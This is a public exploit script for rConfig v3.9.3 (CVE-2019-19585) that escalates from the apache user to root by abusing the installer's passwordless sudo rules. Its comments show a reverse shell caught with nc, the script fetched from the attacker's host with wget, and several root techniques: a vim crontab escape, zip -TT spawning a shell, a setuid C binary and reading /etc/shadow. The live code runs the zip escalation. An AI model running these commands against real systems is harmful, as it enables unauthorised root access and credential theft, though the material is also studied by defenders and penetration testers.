rconfig_lpe.sh

# Exploit Title: rConfig <= v3.9.3 - Privilege Escalation
# Date: 07/11/2019
# CVE-2019-19585
# Exploit Author: vikingfr
# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
# Software Link : http://files.rconfig.com/downloads/scripts/centos7_install.sh
# Version: tested v3.9.3
# Tested on: CentOS 7.7
#
# Notes : If you want to reproduce in your lab environment follow those links :
# http://help.rconfig.com/gettingstarted/installation
# then
# http://help.rconfig.com/gettingstarted/postinstall
#
# Reading the "rConfig 3.x Installation Instructions" (http://help.rconfig.com/gettingstarted/installation), we can notice 2 install scripts are used :
# $ curl -O http://files.rconfig.com/downloads/scripts/install_rConfig.sh -A "Mozilla"
# $ grep curl install_rConfig.sh 
#   curl -O http://files.rconfig.com/downloads/scripts/centos7_install.sh -A "Mozilla"  >> $LOGFILE 2>&1
#   curl -O http://files.rconfig.com/downloads/scripts/centos6_install.sh -A "Mozilla" >> $LOGFILE 2>&1
# 
# Looking at the install scripts, we see that Apache is sudoer.
# $ sed -n 131,148p centos7_install.sh
# #SUDOERs Update
#  SUDOINSTALLMSG="Updating Sudoers File..."
#  echo $SUDOINSTALLMSG;
#  echo -ne '#####                     (33%\r)'
#  sleep 1
#  echo -ne '#############             (66%)\r'
#  sleep 1
#  echo -ne '##########################(100%)\n'
#  echo "<<<< Start - $SUDOINSTALLMSG >>>>"  >> $LOGFILE 2>&1 
#   	# update sudoers for rconfig specific tasks
# 	echo '### rConfig specific Apahce configuration' >> /etc/sudoers
# 	echo 'apache ALL = (ALL) NOPASSWD: /usr/bin/crontab, /usr/bin/zip, /bin/chmod, /bin/chown, /usr/bin/whoami, /usr/bin/wc, /usr/bin/tail, /bin/rm' >> /etc/sudoers 
# 	echo 'Defaults:apache !requiretty' >> /etc/sudoers 
# 	cat /etc/sudoers >> $LOGFILE 2>&1
# 	echo -e  "${green}Status: Sudoers Updated${reset}\n"; 
#  echo "<<<< End - $SUDOINSTALLMSG >>>>"  >> $LOGFILE 2>&1
#
# So if an attacker got a web RCE / Apache shell access, privilege escalation can be done with multiples techniques.
#
# Example
# $ python3 rconfig_CVE-2019-19509.py https://192.168.43.34 admin root 192.168.43.245 8081
# rconfig - CVE-2019-19509 - Web authenticated RCE
# [+] Logged in successfully, triggering the payload...
# [+] Check your listener !
#
# $ nc -nvlp 8081
# listening on [any] 8081 ...
# connect to [192.168.43.245] from (UNKNOWN) [192.168.43.34] 34470
# bash: no job control in this shell
# bash-4.2$
# 
# bash-4.2$ wget http://192.168.43.245:8000/rconfig_lpe.sh
# wget http://192.168.43.245:8000/rconfig_lpe.sh
# bash-4.2$ chmod 700 rconfig_lpe.sh
# bash-4.2$ ./rconfig_lpe.sh
#
# ./rconfig_lpe.sh
# rConfig v3.9.3 - Privilege Escalation
# id
# uid=0(root) gid=0(root) groups=0(root)

###########################
# LPE using crontab (ex : using vim)
###########################
# bash-4.2$ sudo crontab -e
# sudo crontab -e
# ...
# :set shell=/bin/sh                
# :shell            
# id
# uid=0(root) gid=0(root) groups=0(root)

###########################
# LPE using ZIP
###########################
# bash-4.2$ touch /tmp/LPE.txt
# bash-4.2$ sudo zip -q /tmp/LPE.zip /tmp/LPE.txt -T -TT '/bin/sh #'
# id
# uid=0(root) gid=0(root) groups=0(root)
echo "rConfig v3.9.3 - Privilege Escalation"
touch /tmp/LPE.txt
sudo zip -q /tmp/LPE.zip /tmp/LPE.txt -T -TT '/bin/sh #'

###########################
# LPE using chmod / chown
###########################
# bash-4.2$ cd /tmp
# bash-4.2$ echo 'int main() { setresuid(0,0,0); system("/bin/sh"); }' > privshell.c
# bash-4.2$ gcc -o privshell privshell.c
# bash-4.2$ rm privshell.c
# bash-4.2$ sudo chown root:root /tmp/privshell
# bash-4.2$ sudo chmod u+s /tmp/privshell
# bash-4.2$ ./privshell
# id
# uid=0(root) gid=48(apache) groups=48(apache)

###########################
# FILE READ using TAIL
###########################
#bash-4.2$ sudo tail -22 /etc/shadow
#sudo tail -22 /etc/shadow
#root:$6$Jhxxxxxxxxxxxxxxxxxxx8/:18208:0:99999:7:::
#bin:*:17834:0:99999:7:::
#daemon:*:17834:0:99999:7:::
# ...

# EOF